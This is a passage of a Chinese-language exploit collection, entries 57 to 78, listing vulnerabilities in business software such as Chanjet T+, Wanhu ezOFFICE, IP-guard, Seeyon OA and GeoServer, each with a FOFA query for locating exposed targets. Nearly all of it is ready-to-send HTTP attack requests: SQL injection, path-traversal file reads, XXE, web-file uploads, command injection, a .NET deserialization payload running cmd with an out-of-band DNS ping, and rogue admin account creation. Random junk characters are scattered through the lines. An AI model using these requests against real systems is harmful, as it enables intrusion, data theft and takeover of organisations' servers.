2 @$ q' c$ V9 T5 a% }+ g. ?, yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
; i0 {* }- t4 M! N7 o: RContent-Type: application/json
0 e- P" o: G' w0 }0 l
& I3 p x( k* J6 @{
! z( m( r: _" h* T2 |) z7 a4 B "storeID":{
& [% t+ z& H* K; \4 [/ J1 @ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' E9 \9 p, d+ D* v/ G. W5 z; ?. I "MethodName":"Start",; b- M v& g' C, @8 }1 b
"ObjectInstance":{
: z, H2 q& U B, Z "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", g3 Y9 j. v9 h. s# I+ W* a( O
"StartInfo": {
5 ~2 w C; g6 _0 D7 y& S' c% G- s "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ X3 N" e5 \+ M. w6 E, f0 b
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"+ D# x& Q1 R+ g/ D! u" k
}# y" }. H/ t. N' ?" Z5 \
}
* u# h' T; h7 ` }
( l g+ i5 J' O. x8 C& g}
/ W9 Q$ i {- f( W1 K# U
6 H3 Z" r0 m! `6 [( a% C5 I
" D' v/ g5 s3 f t+ Z" |1 L57. 畅捷通T+ keyEdit.aspx SQL注入
0 t4 E- k1 f5 r% v k6 J' XFOFA:app="畅捷通-TPlus"
+ g- t3 c" @& n7 p2 P7 T0 f( b: qGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
- a4 v+ ~0 L- z6 wHost: host
1 G+ {/ c' ?6 s$ [6 `User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& V k# H5 z0 \ d0 K) f
Accept-Charset: utf-84 n, W/ s, x( x% j
Accept-Encoding: gzip, deflate' H2 R+ R0 _# x# Q, N
Connection: close" k/ P5 ]4 Y6 ]3 l
* [ |1 H( _- w% s; S' V ` ?8 ?" t# [3 a
58. 畅捷通T+ KeyInfoList.aspx sql注入8 \7 b2 Z$ ` F5 i* S7 ~5 n+ t
FOFA:app="畅捷通-TPlus"
A. n8 a" e3 [! Y- \$ cGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1- z9 S" a( b, _0 I$ v; {; m
Host: your-ip
& A. q5 |/ Z4 d/ T- LUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& O3 ]8 V% q! [& I3 ?$ K
Accept-Charset: utf-88 G' Q" W: k# b* ?2 p7 V2 q8 }
Accept-Encoding: gzip, deflate
" o/ u6 b7 L8 P( C) z7 U( vConnection: close t: P, p' N: c# f
# G% R/ w4 H6 _9 J1 p7 a+ ?0 o6 u
. j# N# O3 h' S, u h2 V59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
6 m* L6 g) p- r& T/ a0 `FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
: k, H" R: m* a: `6 XPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1. z7 N* B. k: x% E2 l
Host: 192.168.86.128:9090' Z/ ^7 ]1 z3 j$ y* h$ \/ ^( \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
( K! T9 X2 B+ zConnection: close( [" G6 W3 H' j- H5 f/ o; z
Content-Length: 1669
! S3 T9 D2 C$ OAccept: */*
4 m$ c( V1 b" b8 H YAccept-Language: en
! j/ X5 v" p2 R. T0 ]/ mContent-Type: application/x-www-form-urlencoded, C ^; T: m% \5 p0 h* D
Accept-Encoding: gzip9 |8 P9 i% [) E. E- x+ I$ m
- o M' h% u' W/ f" U9 Q2 y
PAYLOAD0 g0 P- H# ? ?3 g$ D, j
/ [$ {7 `8 L6 F* m" _
. p3 g: K9 a+ w& S8 e
60. 百卓Smart管理平台 importexport.php SQL注入! n* _5 c$ P& }6 v
FOFA:title="Smart管理平台"( L e/ o5 L1 z
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1+ X0 _. G [+ ~% j# Y
Host:7 D, l+ ~# I h0 [% ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 X5 R7 Y/ g# k6 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' Y* O5 f# j/ r/ C) ?8 V4 N: U
Accept-Encoding: gzip, deflate6 Q b Y% ]1 i3 k' d- n( g
Accept-Language: zh-CN,zh;q=0.9& g1 _4 I f1 b9 N
Connection: close
9 ~ ]: I# {1 Q' r+ E2 F8 B# [/ J
% S: [/ ]4 U, G9 Y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传& K! N7 o5 U- r( W
FOFA: title="欢迎使用浙大恩特客户资源管理系统"9 [* z8 m% h4 L; l' K
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
. a* @ s: N4 V7 l! z# NHost: x.x.x.x" G' u6 D$ M( c/ s6 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) e- q% b G6 [$ q+ m R5 U% J
Connection: close
+ l/ _* K) `; r4 V; P8 [5 r7 TContent-Length: 27
; l( Q8 i/ d/ ~* T2 CAccept: */*
8 m+ a" V! V& P3 pAccept-Encoding: gzip, deflate
$ [( Z7 C9 ?1 l! B, W! tAccept-Language: en! G4 I {% s: P1 A4 g8 w
Content-Type: application/x-www-form-urlencoded
, G; m9 v! C5 V. J" Z# D
! e3 Z4 |# `, {+ H# S; s8uxssX66eqrqtKObcVa0kid98xa
! g0 p) A3 x/ I2 @* Y$ W# I2 n+ S, c f- R y2 [, w0 f L4 t
5 J: `9 O# H$ M% J8 _6 Z62. IP-guard WebServer 远程命令执行+ Q+ ^4 A4 _3 c
FOFA:"IP-guard" && icon_hash="2030860561"1 j" ~9 ?2 y4 s& n
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
% s& e% g$ y& W( _# N3 Y; |Host: x.x.x.x
7 G7 d: P+ |' a, R" V. d jUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
6 z4 o4 a. J( j6 y; E0 `Connection: close: J9 l, @ [- H" J5 i' B
Accept: */*
& w' q' o A' G+ H7 m) xAccept-Language: en3 U" Z4 f8 G1 |3 H! Q& g! g: X
Accept-Encoding: gzip0 n! s/ i% ~7 \- Z3 M
0 d) N' B: n2 H1 e9 D2 y8 @' R* H
/ |/ |$ v. J5 C访问
9 M1 I5 K; K( Q2 ?2 {
5 S9 ?+ _; d) {0 k, ]# c2 YGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# t1 H+ a* @+ r6 s( U
Host: x.x.x.x
! L* e. W+ Z+ E4 m5 Y! e! M" L- V O
, g* s- \% h9 j( v$ z. \$ p63. IP-guard WebServer任意文件读取5 ~# C1 _2 `" m ]! p
IP-guard < 4.82.0609.0. ?& k- @7 d$ R3 H
FOFA:icon_hash="2030860561"
8 s3 x- {3 @+ o8 C# ePOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1% q9 d* w% D- g. A/ A& T' P
Host: your-ip
9 O. F$ p# T9 W' p) c% h/ R. y7 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; s7 b# W/ K( f& }7 g( pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% a n- p2 b0 p! g8 R
Accept-Encoding: gzip, deflate; t& m. @- }- E+ x" V6 k- M
Accept-Language: zh-CN,zh;q=0.9
: l$ r4 w6 Y, m; p |- x3 o& }Connection: close
: W; S. O6 S2 bContent-Type: application/x-www-form-urlencoded4 G5 m5 L( b/ P/ [
8 Z- F7 A7 p* ?1 y c
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A2 I0 F- r9 p8 Z! Z! _
, e5 d/ o# b0 e: ^3 \64. 捷诚管理信息系统CWSFinanceCommon SQL注入
0 p! Z& f3 K0 D' M) IFOFA:body="/Scripts/EnjoyMsg.js"
& Y5 K9 v! L, d1 zPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
8 D& a# t/ D1 D2 }Host: 192.168.86.128:9001
# n. K" I! F0 u7 [User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.369 p1 H ?# S/ |; r$ Z
Connection: close- y. b3 _+ ~$ ~$ _
Content-Length: 369; ~5 g8 x. X9 Y8 r: `7 F
Accept: */*0 K* g, ^4 L2 x7 h* F
Accept-Language: en5 j: Y0 e4 D4 L1 A* s# |
Content-Type: text/xml; charset=utf-83 P% m4 q9 z* M/ N% L( d, k' ^) X& V" Z
Accept-Encoding: gzip7 h6 y" X' Z3 S- u" w* ]' J
3 F% S; _# d+ T6 V8 _! b, a9 V3 U
<?xml version="1.0" encoding="utf-8"?>) C: |+ L% S$ S& V! l
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. S* U+ ^1 n b( {<soap:Body>
9 W& s1 u% K/ B" l' G <GetOSpById xmlns="http://tempuri.org/">" N" M8 h' Y4 o
<sId>1';waitfor delay '0:0:5'--+</sId>
0 S& T% Y1 C) [ </GetOSpById>
! H1 e$ ~! @6 ]6 |- R/ K </soap:Body>9 U4 X9 ` j' r0 \7 `5 a/ f' O
</soap:Envelope>
2 `, F9 r: l) c4 e2 l" |1 A: A2 X7 r3 U5 B' _
' Q5 D) l- x, r/ M1 q/ R9 z9 {65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& l K& b( f, ^. ]
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
% a; V: w9 @" \响应200即成功创建账号test123456/123456
6 {# T+ [/ P7 gPOST /SystemMng.ashx HTTP/1.1
0 ?! D2 l/ z8 }; WHost:4 F$ d, S2 j9 F* m+ D
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)3 W0 g" A: ^3 y0 U, g; E, M$ B
Accept-Encoding: gzip, deflate) b) [. t4 O$ D2 k# C6 X: W
Accept: */*& r# P- Y7 x5 i. V( Z; R' n0 X: S
Connection: close3 F/ |5 I% c2 o% ?) x
Accept-Language: en7 T7 D4 I6 q& `2 p3 r2 h! X
Content-Length: 174
. {- |& {8 Y2 |+ Z- t- J, b
5 S$ r% r U* A+ D4 |' toperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators& A- E5 C9 F. S: p% e
& U+ T8 G4 v& B4 `0 r- {- G
6 }" ~' L" \, n D* \( ^66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入$ P) K p6 k2 A6 G2 u/ m1 f" x* C* |
FOFA:app="万户ezOFFICE协同管理平台"
- B' n, |5 Z! t K# V9 ~: O8 k1 [; C& h9 S& r5 g
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1& O3 \2 r/ R% C' ?( z# s& w
Host: x.x.x.x6 y ?3 E" F9 \4 J: w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" Q& [8 ^, l4 n3 P3 ], W }
Connection: close
( Z8 F! \. _0 [- k) h% mAccept: */*6 _# ]- l% @3 J* Q0 p
Accept-Language: en% m0 G6 B! r/ D# W; W, c0 H' b. l9 `
Accept-Encoding: gzip
5 k- Z6 A5 C/ i
- b) ~- B+ ]9 ]' P$ p5 `" s
1 c5 I, Z3 ^# A) c; d6 Z9 p第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在& C; G' S9 p- [& F) r
; s# [' N) c% N. i; I
67. 万户ezOFFICE wpsservlet任意文件上传
: E% t$ X6 `& y! v' `& SFOFA:app="万户网络-ezOFFICE"
& U; V9 |: v$ \/ N7 ?' J1 ]newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
2 X' v7 y: L9 u: oPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1; ]4 ]+ O3 T! q8 @5 x
Host: x.x.x.x& M2 R; H) z6 h: `9 K' Y% N# ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
1 x1 J ^6 i2 L# X1 _2 JContent-Length: 173; s) M: S) m* E ?. n9 v6 ]; D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/ j, J) m5 z/ G9 f0 U
Accept-Encoding: gzip, deflate
% v/ d. {5 v( {$ f6 [1 gAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 b' ]; T' f, n Z
Connection: close$ P$ H3 q3 n" V3 n
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp: x _4 i8 @ x
DNT: 1
, }7 A J2 P: k: Y- cUpgrade-Insecure-Requests: 15 A! i U% }% h" H: m0 \6 M X
( o9 Q: E2 z: m6 j
--ufuadpxathqvxfqnuyuqaozvseiueerp# s; w% P- D- L, C- [- K$ H4 V2 L. I4 _
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"7 T2 W5 }" o/ J- `
0 o9 Z' E& h- C$ I" I" W0 p: p
<% out.print("sasdfghjkj");%>$ o9 A: l$ g; H# v$ e) \; q
--ufuadpxathqvxfqnuyuqaozvseiueerp--
3 O4 k! U. j* K- a/ U; E0 f. X, h7 W- H% z: {/ V
% d( O+ L8 N+ |) N" _- O" s: C) X Z# C" t
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
! o# p V1 i, X$ l \
7 A/ g( M7 v {2 L# [8 r4 p% o5 B68. 万户ezOFFICE wf_printnum.jsp SQL注入2 ^9 {( P7 Z) ^: v! q: l% r9 i
FOFA:app="万户ezOFFICE协同管理平台"4 r. y5 v7 [+ j! ~; Y- p$ N
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ W F m3 Y6 l2 N- T8 q
Host: {{host}}# O' B5 R2 d! n7 c; U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36* R' q9 U! B1 P$ n" l3 y/ a# y ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.82 g; Y4 ]- g. K' l+ m$ A$ q
Accept-Encoding: gzip, deflate% M( k* E) ]7 g. L# D3 x; m5 V
Accept-Language: zh-CN,zh;q=0.9+ b& p% A. \/ d5 N8 ~) J3 }) I( o
Connection: close
/ z6 G8 K- q) z$ g- ]3 {1 P' w$ O# [& I/ w1 k
& q$ L; T, ^+ {0 V/ l6 n H
69. 万户 ezOFFICE contract_gd.jsp SQL注入- u4 w5 |' N& B+ x" F, D+ x/ E
FOFA:app="万户ezOFFICE协同管理平台": L- l/ W! E& R" M' K) q& e. ]
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
0 O' T: v% t, x/ U; V* P2 UHost: your-ip, U4 w: m5 R! R0 A; {
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) m+ s: T$ ~8 Y1 J0 V5 k$ gAccept-Encoding: gzip, deflate
/ D% ]. D' \% o$ fAccept: */*: ~3 w' L6 {+ O0 A5 W9 _/ o5 a0 h
Connection: keep-alive3 E, f: F6 _) s, S6 D
3 E+ J( i" @% ?8 p+ I6 h7 M: J# X; p, f! n# ~
70. 万户ezEIP success 命令执行; T% _: i) ^2 \8 x* h3 ^
FOFA:app="万户网络-ezEIP": s/ q6 @ y+ ?& Q P1 Z( s
POST /member/success.aspx HTTP/1.1
5 T, ^' i" S; Q, }# e; t$ nHost: {{Hostname}}
1 v6 s8 t7 I( e* ]) z# BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% E6 R; u. o8 ZSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=8 L- ]5 O1 ]6 C& A
Content-Type: application/x-www-form-urlencoded3 S. \+ y7 l7 h/ c. @0 q
TYPE: C2 J2 e" c7 v8 a0 U0 g$ [ }
Content-Length: 16702
$ n) d/ N( l0 F; Y
! C5 e/ v9 Z3 [2 ]1 c9 h__VIEWSTATE=PAYLOAD
1 R0 p) w3 y% y
5 Y* X) H0 [& u. M6 \: d
4 l: }4 l. l7 w6 t& z* t) h2 X71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 o) E+ W+ o# v6 g" X; A! `/ \. l- w5 @FOFA:body="PM2项目管理系统BS版增强工具.zip"
2 w7 X& M% c& L; EGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
7 m _1 ^+ I) e" Q, `2 G# m& V2 ~Host: x.x.x.xx.x.x.x* \! G( K1 U! N7 x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
/ W1 m0 T7 L7 D. H" Q2 DConnection: close
, B% _0 j" e- V! D+ NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 w2 G3 ~: L- D+ b7 ~Accept-Encoding: gzip, deflate
% a2 u% m6 ~+ o* X5 u7 z [5 H% gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: j/ e' J% s! g. J/ I% }Upgrade-Insecure-Requests: 1' R" Y$ I/ W9 r2 C2 y' F
8 Y! k2 ^! W, Q7 z: S: d
) D7 [9 o3 z' U# N% d72. 致远OA getAjaxDataServlet XXE
$ ? p( P. O' Q& [" v( D, T0 O: ~FOFA:app="致远互联-OA"3 x2 Y) A; [/ A( c, B& H$ W9 D" {: x& O4 s
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.16 V7 m" `! P, _4 x" u# R9 K2 \
Host: 192.168.40.131:8099, @/ i& {' f6 X0 M5 ^
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( [ D8 i% v- `, ?5 o* I4 D
Connection: close# C5 a2 }+ \* P
Content-Length: 583
" U, @( N( M0 K0 S3 hContent-Type: application/x-www-form-urlencoded
: u+ I5 s! f6 y' _( f: qAccept-Encoding: gzip
- b9 z2 m* S4 d& L2 [* v3 ]+ O* H& h z7 K' k; K
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 u+ a4 b9 U4 g
6 ? [5 q, X1 w* B7 n0 q
" _) y, |' G l& ^73. GeoServer wms远程代码执行" q4 i+ a8 f+ ~( M- m5 }
FOFA:icon_hash=”97540678”
3 ?$ m- k7 i/ uPOST /geoserver/wms HTTP/1.1 E- T1 Z. M6 N" y- C1 u1 c
Host:
6 v; `; Q0 J& T, R5 h" pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) h9 D) p) K9 Y. B. _Content-Length: 19811 @7 e7 j) B- d& d
Accept-Encoding: gzip, deflate* ]# A# @2 l9 c
Connection: close
5 D) B# Q5 M! F j$ hContent-Type: application/xml' s: O. R |- V+ w% _7 T
SL-CE-SUID: 3( E2 \% z1 V" r1 \( e
6 v/ {) J" o: z( B7 J1 ePAYLOAD
+ ^( E9 z; v% b4 W) k4 A* Q
; F) e+ S) q7 t
. u& @$ r _5 [( v. _3 X74. 致远M3-server 6_1sp1 反序列化RCE
F5 _; d+ `# I( R+ XFOFA:title="M3-Server"
/ s. A6 P: x6 W0 y4 F+ qPAYLOAD
* m# @* L" N6 K; q0 O" n8 m* J2 ]6 d9 y" H( ]) a/ T$ q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* Y9 |: P, N! p7 A
FOFA:app="TELESQUARE-TLR-2005KSH"1 l5 O O3 R3 t3 w) r' C, z
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
: C8 S% q# w6 ^7 H- {- FHost: x.x.x.x
- l, N" `9 ^# U7 S+ [5 [3 s- NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; V5 O. I- o GConnection: close
) K, j+ i9 @0 i: T) i' c4 t: `/ fAccept: */*
; m$ y" O& u& W( b! f0 V1 ZAccept-Language: en* h- x4 N3 p0 |) Z7 m( z
Accept-Encoding: gzip0 W4 n i" D0 u* M! v' O
& H0 ~% _* Z/ q; J( l4 T
+ C n5 e, _5 D! L. {
GET /cgi-bin/test28256.txt HTTP/1.1. {/ I8 m8 ^4 _8 g; g8 r- ~8 s' G
Host: x.x.x.x) j9 v0 q+ Y3 U5 [, h
1 D2 ? Q+ ^! k, S& `; p, z3 t7 x3 g1 s0 v- p
76. 新开普掌上校园服务管理平台service.action远程命令执行
" F2 B1 T- r2 [* j: W! vFOFA:title="掌上校园服务管理平台"
, o+ w7 f% ^2 u( OPOST /service_transport/service.action HTTP/1.15 I: b" |4 K( {& {
Host: x.x.x.x% X$ F2 z, u( y2 a' l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! [' J! x, S. e) p w7 @" VConnection: close
$ F' n" S( J+ Z2 m7 u" iContent-Length: 211' V7 p) g9 ?. Q/ k: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
E0 O4 h; Z5 XAccept-Encoding: gzip, deflate# {0 }" R K: S* k* Y3 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% _& y2 a3 A$ O) a; k. S
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A49 g# z" u- b! O7 h5 s2 _' a
Upgrade-Insecure-Requests: 1
+ Z: U- {! c2 z! z5 j( ^
" d4 j$ u* [ C/ r5 `* @{
P4 n# K9 t6 u2 ?7 ~* w"command": "GetFZinfo",1 A- n- m1 I: o1 T$ A L
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\", R* M: J! ?+ o$ }6 T1 }
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! i$ O# ^% U7 X$ s/ j: R
} J7 K6 R9 u& L8 D. }( {9 S( `" ]
: {7 @2 B1 {9 d$ f
! M; I4 l4 q! Y5 IGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.13 M3 m3 [2 W. X- a+ G% |. @+ F
Host: x.x.x.x
* v/ J& B2 D* G% [3 K& H2 \0 s2 K: U/ N! Y
6 ^- O4 `+ L/ o8 y$ L5 T
; T( R6 d4 G5 Y+ h E& W! r77. F22服装管理软件系统UploadHandler.ashx任意文件上传
/ r) g) D* y# a1 N. n8 PFOFA:body="F22WEB登陆"/ X: N" Q, _; b- X v
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1" c. ]6 E2 C. x
Host: x.x.x.x9 g- f+ t5 ^% @' p( g1 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 M5 `7 @6 m) {6 h7 [1 @0 p6 }Connection: close
5 m5 z5 {0 w: E4 |( uContent-Length: 433
7 |+ q1 E* g' M$ _5 LAccept: */*
3 J4 x; p5 p6 @: @8 _% mAccept-Encoding: gzip, deflate
: x0 O, c1 |2 U! T' m! n& B: Z5 [# JAccept-Language: zh-CN,zh;q=0.93 }/ R4 w" T6 A, z
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix$ |( [; j, Q/ k: Q0 M1 |
; Y- t# H$ V3 E" R/ u, a. k& z7 A M
------------398jnjVTTlDVXHlE7yYnfwBoix
$ m' O3 s# J% p, Z5 n: |( Y, B3 YContent-Disposition: form-data; name="folder"
- Q, ?; d, q# `$ h5 l
3 r& L# ?. o+ Z: X* j7 K/upload/udplog
( [. B5 k" g7 Y, F, K4 _------------398jnjVTTlDVXHlE7yYnfwBoix, A7 P; a+ t6 f* g0 K1 V5 r
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"' g' |5 t$ X# f, [. y! v
Content-Type: application/octet-stream. O6 X/ B* t' L. B
' w4 R- u: b0 j$ e% l) z1 bhello1234567
# D( K9 H, F) u4 T3 `------------398jnjVTTlDVXHlE7yYnfwBoix
( |' ?7 }' B) E! w/ W" N' f+ T5 nContent-Disposition: form-data; name="Upload"- F; i; B) T) o, m
7 l$ [8 d* Q$ z! V, n* O$ mSubmit Query( w2 {" v2 U+ q1 D' o
------------398jnjVTTlDVXHlE7yYnfwBoix--3 E% |* n7 F4 n* t* z0 h, O
0 s8 f: T& k) `( d) D
$ C$ x" |( l! L! Q7 t. T; O78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传* A: p2 u5 M) B* V4 Z. K
FOFA:icon_hash="2001627082"
" E: B+ R7 j$ z) ] F" w# tPOST /Platform/System/FileUpload.ashx HTTP/1.1
5 b( h6 M1 c0 A ^1 f1 |% ~# ^# V- nHost: x.x.x.x6 I3 U4 G9 N5 ^* e; a' B1 D2 C( G$ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" x! k* |) `* P7 r8 m/ G
Connection: close
% ^5 v" \6 D" P9 u5 m* F4 LContent-Length: 336. ^% ^9 t+ L8 A
Accept-Encoding: gzip
% U. w9 E7 ]% S! z' eContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
0 L- d* x( G8 y" F( n
1 n4 m! h) Z; Y) m w------YsOxWxSvj1KyZow1PTsh98fdu6l: E9 O2 p4 H" i$ T7 y4 d- Q
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt" d8 n8 v$ j9 K
Content-Type: image/png
- e8 b2 k" x4 H$ g& g) i$ s" E6 B6 x
$ | ?( x+ u3 m/ r, O, BYsOxWxSvj1KyZow1PTsh98fdu6l9 w( _* v8 ~% S: T/ g
